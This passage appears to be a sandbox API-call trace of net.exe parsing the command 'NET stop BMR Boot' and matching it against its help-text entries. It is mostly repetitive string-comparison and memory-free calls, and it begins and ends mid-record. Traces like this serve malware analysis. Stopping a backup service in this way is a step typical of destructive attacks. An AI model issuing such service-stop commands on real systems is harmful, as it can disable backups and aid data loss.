Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START SCHEDUL", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x12 [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START SERVER\r", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0xf [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START UPS\r\n", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x17 [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START WORKSTA", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x18 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START\r\n[servi", _MaxCount=0x11) returned 14 [0105.128] LocalFree (hMem=0x473e00) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x2a [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET STATISTICS\r\n[", _MaxCount=0x11) returned 14 [0105.128] LocalFree (hMem=0x473e00) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET STOP\r\nservice", _MaxCount=0x11) returned 19 [0105.128] LocalFree (hMem=0x473e00) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x58 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET TIME\r\n\r\n[\\\\co", _MaxCount=0x11) returned -1 [0105.128] LocalFree (hMem=0x4756f8) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x184 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET USE\r\n[devicen", _MaxCount=0x11) returned -2 [0105.128] LocalFree (hMem=0x4756f8) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xc7 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET USER\r\n[userna", _MaxCount=0x11) returned -2 [0105.128] LocalFree (hMem=0x4756f8) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x47 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET VIEW\r\n[\\\\comp", _MaxCount=0x11) returned -3 [0105.128] LocalFree (hMem=0x4756f8) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xc2 [0105.128] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET\r\n [ ACCOUN", _MaxCount=0x11) returned 19 [0105.128] LocalFree (hMem=0x4756f8) returned 0x0 [0105.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x319 [0105.129] _wcsnicmp (_String1="NET stop BMR Boot", _String2="SERVICES\r\nNET STA", _MaxCount=0x11) returned -5 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x483 [0105.129] _wcsnicmp (_String1="NET stop BMR Boot", _String2="SYNTAX\r\nThe follo", _MaxCount=0x11) returned -5 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xa86 [0105.129] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NAMES\r\nThe follow", _MaxCount=0x11) returned 4 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x54 [0105.129] _wcsnicmp (_String1="NET stop BMR Boot", _String2="\r\nFor more inform", _MaxCount=0x11) returned 97 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xad [0105.129] _wcsnicmp (_String1="NET stop BMR", _String2="NET ACCOUNTS", _MaxCount=0xc) returned 18 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x2e [0105.129] _wcsnicmp (_String1="NET stop BMR", _String2="NET COMPUTER", _MaxCount=0xc) returned 16 [0105.129] LocalFree (hMem=0x473e00) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x7d [0105.129] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONFIG S", _MaxCount=0xc) returned 16 [0105.129] LocalFree (hMem=0x4756f8) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x26 [0105.129] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONFIG\r\n", _MaxCount=0xc) returned 16 [0105.129] LocalFree (hMem=0x473e00) returned 0x0 [0105.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET CONTINUE", _MaxCount=0xc) returned 16 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x1b [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET FILE\r\n[i", _MaxCount=0xc) returned 13 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xbe [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET GROUP\r\n[", _MaxCount=0xc) returned 12 [0105.130] LocalFree (hMem=0x4756f8) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x33 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET HELP\r\nco", _MaxCount=0xc) returned 11 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET HELPMSG\r", _MaxCount=0xc) returned 11 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xc1 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET LOCALGRO", _MaxCount=0xc) returned 7 [0105.130] LocalFree (hMem=0x4756f8) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x16 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET PAUSE\r\ns", _MaxCount=0xc) returned 3 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x33 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET SESSION\r", _MaxCount=0xc) returned 15 [0105.130] LocalFree (hMem=0x473e00) returned 0x0 [0105.130] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x234 [0105.130] _wcsnicmp (_String1="NET stop BMR", _String2="NET SHARE\r\ns", _MaxCount=0xc) returned 12 [0105.131] LocalFree (hMem=0x4756f8) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x13 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START BR", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START CL", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START EV", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START ME", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START NE", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x16 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START RP", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x11 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START RP", _MaxCount=0xc) returned 14 [0105.131] LocalFree (hMem=0x473e00) returned 0x0 [0105.131] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.131] _wcsnicmp (_String1="NET stop BMR", _String2="NET START SC", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x12 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET START SE", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0xf [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET START UP", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x17 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET START WO", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x18 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET START\r\n[", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x2a [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET STATISTI", _MaxCount=0xc) returned 14 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET STOP\r\nse", _MaxCount=0xc) returned 19 [0105.132] LocalFree (hMem=0x473e00) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16㸀G\x16") returned 0x58 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET TIME\r\n\r\n", _MaxCount=0xc) returned -1 [0105.132] LocalFree (hMem=0x4796f8) returned 0x0 [0105.132] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0x184 [0105.132] _wcsnicmp (_String1="NET stop BMR", _String2="NET USE\r\n[de", _MaxCount=0xc) returned -2 [0105.132] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0xc7 [0105.133] _wcsnicmp (_String1="NET stop BMR", _String2="NET USER\r\n[u", _MaxCount=0xc) returned -2 [0105.133] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0x47 [0105.133] _wcsnicmp (_String1="NET stop BMR", _String2="NET VIEW\r\n[\\", _MaxCount=0xc) returned -3 [0105.133] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0xc2 [0105.133] _wcsnicmp (_String1="NET stop BMR", _String2="NET\r\n [ A", _MaxCount=0xc) returned 19 [0105.133] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0x319 [0105.133] _wcsnicmp (_String1="NET stop BMR", _String2="SERVICES\r\nNE", _MaxCount=0xc) returned -5 [0105.133] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0x483 [0105.133] _wcsnicmp (_String1="NET stop BMR", _String2="SYNTAX\r\nThe ", _MaxCount=0xc) returned -5 [0105.133] LocalFree (hMem=0x4796f8) returned 0x0 [0105.133] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0xa86 [0105.134] _wcsnicmp (_String1="NET stop BMR", _String2="NAMES\r\nThe f", _MaxCount=0xc) returned 4 [0105.134] LocalFree (hMem=0x4796f8) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0x54 [0105.134] _wcsnicmp (_String1="NET stop BMR", _String2="\r\nFor more i", _MaxCount=0xc) returned 97 [0105.134] LocalFree (hMem=0x4796f8) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16雸G\x16") returned 0xad [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0105.134] LocalFree (hMem=0x4796f8) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16雸G\x16") returned 0x2e [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0105.134] LocalFree (hMem=0x473e00) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16㸀G\x16") returned 0x7d [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0105.134] LocalFree (hMem=0x4796f8) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16雸G\x16") returned 0x26 [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0105.134] LocalFree (hMem=0x473e00) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0105.134] LocalFree (hMem=0x473e00) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x1b [0105.134] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0105.134] LocalFree (hMem=0x473e00) returned 0x0 [0105.134] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16㸀G\x16") returned 0xbe [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0105.135] LocalFree (hMem=0x4796f8) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16雸G\x16") returned 0x33 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16㸀G\x16") returned 0xc1 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0105.135] LocalFree (hMem=0x4796f8) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16雸G\x16") returned 0x16 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x33 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="雸G⡋盺\x16㸀G\x16") returned 0x234 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0105.135] LocalFree (hMem=0x4796f8) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16雸G\x16") returned 0x13 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.135] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.135] LocalFree (hMem=0x473e00) returned 0x0 [0105.135] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x16f300, 